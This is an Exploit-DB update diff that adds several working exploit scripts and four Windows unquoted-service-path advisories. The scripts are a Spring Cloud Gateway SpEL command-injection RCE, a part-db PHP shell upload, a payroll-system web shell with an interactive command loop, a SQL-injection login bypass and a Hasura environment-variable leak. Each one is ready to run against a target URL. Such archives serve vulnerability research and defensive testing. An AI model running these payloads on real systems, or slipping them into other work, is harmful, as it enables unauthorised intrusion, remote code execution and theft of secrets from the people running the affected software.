DB: 2022-03-08

9 changes to exploits/shellcodes

Private Internet Access 3.3 - 'pia-service' Unquoted Service Path
Cloudflare WARP 1.4 - Unquoted Service Path
Malwarebytes 4.5 - Unquoted Service Path
Foxit PDF Reader 11.0 - Unquoted Service Path
Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)
part-db 0.5.11 - Remote Code Execution (RCE)
Attendance and Payroll System v1.0 - Remote Code Execution (RCE)
Attendance and Payroll System v1.0 - SQLi Authentication Bypass
Hasura GraphQL 2.2.0 - Information Disclosure

exploits/java/webapps/50799.py

@@ -0,0 +1,87 @@
+# Exploit Title: Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)
+# Google Dork: N/A
+# Date: 03/03/2022
+# Exploit Author: Carlos E. Vieira
+# Vendor Homepage: https://spring.io/
+# Software Link: https://spring.io/projects/spring-cloud-gateway
+# Version: This vulnerability affect Spring Cloud Gateway < 3.0.7 & < 3.1.1
+# Tested on: 3.1.0
+# CVE : CVE-2022-22947
+
+import random
+import string
+import requests
+import json
+import sys
+import urllib.parse
+import base64
+
+headers = { "Content-Type": "application/json" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'}
+proxies = {
+    'http': 'http://172.29.32.1:8081',
+    'https': 'http://172.29.32.1:8081',
+}
+id = ''.join(random.choice(string.ascii_lowercase) for i in range(8))
+
+def exploit(url, command):
+
+    payload = { "id": id, "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022"+command+"\u0022).getInputStream()))}"}}],"uri": "http://example.com"}
+
+    commandb64 =base64.b64encode(command.encode('utf-8')).decode('utf-8')
+
+    rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), proxies=proxies, verify=False)
+    if(rbase.status_code == 201):
+        print("[+] Stage deployed to /actuator/gateway/routes/"+id)
+        print("[+] Executing command...")
+        r = requests.post(url + '/actuator/gateway/refresh', headers=headers, proxies=proxies, verify=False)
+        if(r.status_code == 200):
+            print("[+] getting result...")
+            r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False)
+            if(r.status_code == 200):
+                get_response = r.json()
+                clean(url, id)
+                return get_response['filters'][0].split("'")[1]
+            else:
+                print("[-] Error: Invalid response")
+                clean(url, id)
+                exit(1)
+        else:
+            clean(url, id)
+            print("[-] Error executing command")
+
+
+def clean(url, id):
+    remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False)
+    if(remove.status_code == 200):
+        print("[+] Stage removed!")
+    else:
+        print("[-] Error: Fail to remove stage")
+
+def banner():
+    print("""
+    ###################################################
+    #                                                 #
+    #   Exploit for CVE-2022-22947                    #
+    #   - Carlos Vieira (Crowsec)                     #
+    #                                                 #
+    #   Usage:                                        #
+    #   python3 exploit.py <url> <command>            #
+    #                                                 #
+    #   Example:                                      #
+    #   python3 exploit.py http://localhost:8080 'id' #
+    #                                                 #
+    ###################################################
+    """)
+
+def main():
+    banner()
+    if len(sys.argv) != 3:
+        print("[-] Error: Invalid arguments")
+        print("[-] Usage: python3 exploit.py <url> <command>")
+        exit(1)
+    else:
+        url = sys.argv[1]
+        command = sys.argv[2]
+        print(exploit(url, command))
+if __name__ == '__main__':
+    main()

exploits/multiple/webapps/50803.py

@@ -0,0 +1,47 @@
+# Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure
+# Software: Hasura GraphQL Community
+# Software Link: https://github.com/hasura/graphql-engine
+# Version: 2.2.0
+# Exploit Author: Dolev Farhi
+# Date: 5/05/2022
+# Tested on: Ubuntu
+
+import requests
+
+SERVER_ADDR = 'x.x.x.x'
+
+url = 'http://{}/v1/metadata'.format(SERVER_ADDR)
+
+print('Hasura GraphQL Community 2.2.0 - Arbitrary Root Environment Variables Read')
+
+while True:
+    env_var = input('Type environment variable key to leak.\n> ')
+    if not env_var:
+        continue
+
+    payload = {
+    "type": "bulk",
+    "source": "",
+    "args": [
+        {
+            "type": "add_remote_schema",
+            "args": {
+                "name": "ttt",
+                "definition": {
+                    "timeout_seconds": 60,
+                    "forward_client_headers": False,
+                    "headers": [],
+                    "url_from_env": env_var
+                },
+                "comment": ""
+            }
+        }
+    ],
+    "resource_version": 2
+}
+    r = requests.post(url, json=payload)
+    try:
+       print(r.json()['error'].split('not a valid URI:')[1])
+    except IndexError:
+        print('Could not parse out VAR, dumping error as is')
+        print(r.json().get('error', 'N/A'))

exploits/php/webapps/50800.sh

@@ -0,0 +1,21 @@
+# Exploit Title: part-db 0.5.11 - Remote Code Execution (RCE)
+# Google Dork: NA
+# Date: 03/04/2022
+# Exploit Author: Sunny Mehra @DSKMehra
+# Vendor Homepage: https://github.com/part-db/part-db
+# Software Link: https://github.com/part-db/part-db
+# Version: [ 0.5.11.]
+# Tested on: [KALI OS]
+# CVE : CVE-2022-0848
+#
+---------------
+
+#!/bin/bash
+host=127.0.0.1/Part-DB-0.5.10 #WEBHOST
+#Usage: Change host
+#Command: bash exploit.sh
+#EXPLOIT BY @DSKMehra
+echo "<?php system(id); ?>">POC.phtml  #PHP Shell Code
+result=`curl -i -s -X POST -F "logo_file=@POC.phtml" "http://$host/show_part_label.php" | grep -o -P '(?<=value="data/media/labels/).*(?=" > <p)'`
+rm POC.phtml
+echo Shell Location : "$host/data/media/labels/$result"

exploits/php/webapps/50801.py

@@ -0,0 +1,101 @@
+# Exploit Title: Attendance and Payroll System v1.0 - Remote Code Execution (RCE)
+# Date: 04/03/2022
+# Exploit Author: pr0z
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/apsystem.zip
+# Version: v1.0
+# Tested on: Linux, MySQL, Apache
+
+import requests
+import sys
+from requests.exceptions import ConnectionError
+
+# Interface class to display terminal messages
+class Interface():
+    def __init__(self):
+        self.red = '\033[91m'
+        self.green = '\033[92m'
+        self.white = '\033[37m'
+        self.yellow = '\033[93m'
+        self.bold = '\033[1m'
+        self.end = '\033[0m'
+
+    def header(self):
+        print('\n    >> Attendance and Payroll System v1.0')
+        print('    >> Unauthenticated Remote Code Execution')
+        print('    >> By pr0z\n')
+
+    def info(self, message):
+        print(f"[{self.white}*{self.end}] {message}")
+
+    def warning(self, message):
+        print(f"[{self.yellow}!{self.end}] {message}")
+
+    def error(self, message):
+        print(f"[{self.red}x{self.end}] {message}")
+
+    def success(self, message):
+        print(f"[{self.green}✓{self.end}] {self.bold}{message}{self.end}")
+
+
+upload_path = '/apsystem/admin/employee_edit_photo.php'
+shell_path = '/apsystem/images/shell.php'
+#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
+
+shell_data = "<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd);}?>"
+
+multipart_form_data = {
+    'id': 1,
+    'upload': (''),
+}
+
+files = {'photo': ('shell.php', shell_data)}
+
+output = Interface()
+output.header()
+
+# Check for arguments
+if len(sys.argv) < 2 or '-h' in sys.argv:
+    output.info("Usage: python3 rce.py http://127.0.0.1")
+    sys.exit()
+
+# Upload the shell
+target = sys.argv[1]
+output.info(f"Uploading the web shell to {target}")
+r = requests.post(target + upload_path, files=files, data=multipart_form_data, verify=False)
+
+# Validating shell has been uploaded
+output.info(f"Validating the shell has been uploaded to {target}")
+r = requests.get(target + shell_path, verify=False)
+try:
+    r = requests.get(target + shell_path)
+    if r.status_code == 200:
+        output.success('Successfully connected to web shell\n')
+    else:
+        raise Exception
+except ConnectionError:
+    output.error('We were unable to establish a connection')
+    sys.exit()
+except:
+    output.error('Something unexpected happened')
+    sys.exit()
+
+# Remote code execution
+while True:
+    try:
+        cmd = input("\033[91mRCE\033[0m > ")
+        if cmd == 'exit':
+            raise KeyboardInterrupt
+        r = requests.get(target + shell_path + "?cmd=" + cmd, verify=False)
+        if r.status_code == 200:
+            print(r.text)
+        else:
+            raise Exception
+    except KeyboardInterrupt:
+        sys.exit()
+    except ConnectionError:
+        output.error('We lost our connection to the web shell')
+        sys.exit()
+    except:
+        output.error('Something unexpected happened')
+        sys.exit()

exploits/php/webapps/50802.py

@@ -0,0 +1,45 @@
+# Exploit Title: Attendance and Payroll System v1.0 - SQLi Authentication Bypass
+# Date: 04/03/2022
+# Exploit Author: pr0z
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/apsystem.zip
+# Version: v1.0
+# Tested on: Linux, MySQL, Apache
+
+import requests
+import sys
+from requests.exceptions import ConnectionError
+
+
+print('\n    >> Attendance and Payroll System v1.0')
+print('    >> Authentication Bypass through SQL injection')
+print('    >> By pr0z\n')
+
+login_path = '/apsystem/admin/login.php'
+index_path = '/apsystem/admin/index.php'
+
+payload = "username=nobodyhavethisusername' UNION SELECT 1 as id, 'myuser' as username, '$2y$10$UNm8zqwv6d07rp3zr6iGD.GXNqo/P4qB7fUZB79M3vmpQ6SidGi.G' as password ,'zzz' as firstname,'zzz' as lastname,'zzz.php' as photo, '2018-04-30' as created_on -- &password=test&login="
+headers = {'Content-Type': 'application/x-www-form-urlencoded'}
+#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
+
+
+# Check for arguments
+if len(sys.argv) < 2 or '-h' in sys.argv:
+    print("[!] Usage: python3 apsystem_sqli.py http://127.0.0.1")
+    sys.exit()
+
+# Bypass Authentication
+target = sys.argv[1]
+print("[+] Extracting Administrator cookie using SQLi ...")
+sess = requests.Session()
+try:
+    sess.get(target + index_path,headers=headers, verify=False)
+    sess.post(target + login_path, data=payload, headers=headers,verify=False)
+except ConnectionError:
+    print('[-] We were unable to establish a connection')
+    sys.exit()
+
+cookie_val = sess.cookies.get_dict().get("PHPSESSID")
+
+print("[+] Use the following cookie:\n")
+print(f"PHPSESSID: {cookie_val}")

exploits/windows/local/50804.txt

@@ -0,0 +1,36 @@
+# Exploit Title: Private Internet Access 3.3 - 'pia-service' Unquoted Service Path
+# Date: 04/03/2022
+# Exploit Author: Saud Alenazi
+# Vendor Homepage: https://www.privateinternetaccess.com
+# Software Link: https://www.privateinternetaccess.com/download
+# Version: 3.3.0.100
+# Tested: Windows 10 x64
+# Contact: https://twitter.com/dmaral3noz
+
+# Step to discover Unquoted Service Path:
+
+C:\Users\saudh>wmic service where 'name like "%PrivateInternetAccessService%"' get name, displayname, pathname, startmode, startname
+
+DisplayName                      Name                          PathName                                                    StartMode  StartName
+Private Internet Access Service  PrivateInternetAccessService  "C:\Program Files\Private Internet Access\pia-service.exe"  Auto       LocalSystem
+
+# Service info:
+
+C:\Users\saudh>sc qc PrivateInternetAccessService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: PrivateInternetAccessService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : "C:\Program Files\Private Internet Access\pia-service.exe"
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Private Internet Access Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

exploits/windows/local/50805.txt

@@ -0,0 +1,25 @@
+# Exploit Title: Cloudflare WARP 1.4 - Unquoted Service Path
+# Date: 05/03/2022
+# Exploit Author: Hejap Zairy
+# Vendor Homepage: https://www.cloudflare.com/
+# Software Link: https://developers.cloudflare.com/warp-client/get-started/windows/
+# Version: 1.4.107
+# Tested: Windows 10 Pro x64 es
+
+C:\Users\Hejap>sc qc CloudflareWARP
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: CloudflareWARP
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Cloudflare\Cloudflare WARP\\warp-svc.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Cloudflare WARP
+        DEPENDENCIES       : wlansvc
+        SERVICE_START_NAME : LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

exploits/windows/local/50806.txt

@@ -0,0 +1,28 @@
+# Exploit Title: Malwarebytes 4.5 - Unquoted Service Path
+# Date: 05/03/2022
+# Exploit Author: Hejap Zairy
+# Vendor Homepage: https://www.malwarebytes.com/
+# Software Link: https://www.malwarebytes.com/mwb-download/
+# Version: 4.5.0
+# Tested: Windows 10 Pro x64 es
+
+C:\Users\Hejap>sc qc MBAMService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: MBAMService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Malwarebytes Service
+        DEPENDENCIES       : RPCSS
+                           : WINMGMT
+        SERVICE_START_NAME : LocalSystem
+
+
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

exploits/windows/local/50807.txt

@@ -0,0 +1,26 @@
+# Exploit Title: Foxit PDF Reader 11.0 - Unquoted Service Path
+# Date: 05/03/2022
+# Exploit Author: Hejap Zairy
+# Vendor Homepage: https://www.foxit.com/pdf-reader/
+# Software Link: https://www.foxit.com/downloads/#Foxit-Reader/
+# Version: 11.0.1.49938
+# Tested: Windows 10 Pro x64 es
+
+C:\Users\Hejap>sc qc  FoxitReaderUpdateService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: FoxitReaderUpdateService
+        TYPE               : 110  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Foxit PDF Reader Update Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

files_exploits.csv

@@ -11457,6 +11457,10 @@ id,file,description,date,author,type,platform,port
 50789,exploits/windows/local/50789.py,"Cobian Reflector 0.9.93 RC1 - 'Password' Denial of Service (PoC)",1970-01-01,"Luis Martínez",local,windows,
 50790,exploits/windows/local/50790.py,"Cobian Backup 11 Gravity 11.2.0.582 - 'Password' Denial of Service (PoC)",1970-01-01,"Luis Martínez",local,windows,
 50791,exploits/windows/local/50791.txt,"Cobian Backup Gravity 11.2.0.582 - 'CobianBackup11' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
+50804,exploits/windows/local/50804.txt,"Private Internet Access 3.3 - 'pia-service' Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows,
+50805,exploits/windows/local/50805.txt,"Cloudflare WARP 1.4 - Unquoted Service Path",1970-01-01,"Hejap Zairy Al-Sharif",local,windows,
+50806,exploits/windows/local/50806.txt,"Malwarebytes 4.5 - Unquoted Service Path",1970-01-01,"Hejap Zairy Al-Sharif",local,windows,
+50807,exploits/windows/local/50807.txt,"Foxit PDF Reader 11.0 - Unquoted Service Path",1970-01-01,"Hejap Zairy Al-Sharif",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -44868,3 +44872,8 @@ id,file,description,date,author,type,platform,port
 50794,exploits/php/webapps/50794.py,"Xerte 3.10.3 - Directory Traversal (Authenticated)",1970-01-01,"Rik Lutz",webapps,php,
 50795,exploits/php/webapps/50795.py,"Xerte 3.9 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Rik Lutz",webapps,php,
 50797,exploits/multiple/webapps/50797.txt,"Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)",1970-01-01,"Momen Eldawakhly",webapps,multiple,
+50799,exploits/java/webapps/50799.py,"Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)",1970-01-01,"Carlos E. Vieira",webapps,java,
+50800,exploits/php/webapps/50800.sh,"part-db 0.5.11 - Remote Code Execution (RCE)",1970-01-01,"Chetanya Sharma",webapps,php,
+50801,exploits/php/webapps/50801.py,"Attendance and Payroll System v1.0 - Remote Code Execution (RCE)",1970-01-01,pr0z,webapps,php,
+50802,exploits/php/webapps/50802.py,"Attendance and Payroll System v1.0 - SQLi Authentication Bypass",1970-01-01,pr0z,webapps,php,
+50803,exploits/multiple/webapps/50803.py,"Hasura GraphQL 2.2.0 - Information Disclosure",1970-01-01,"Dolev Farhi",webapps,multiple,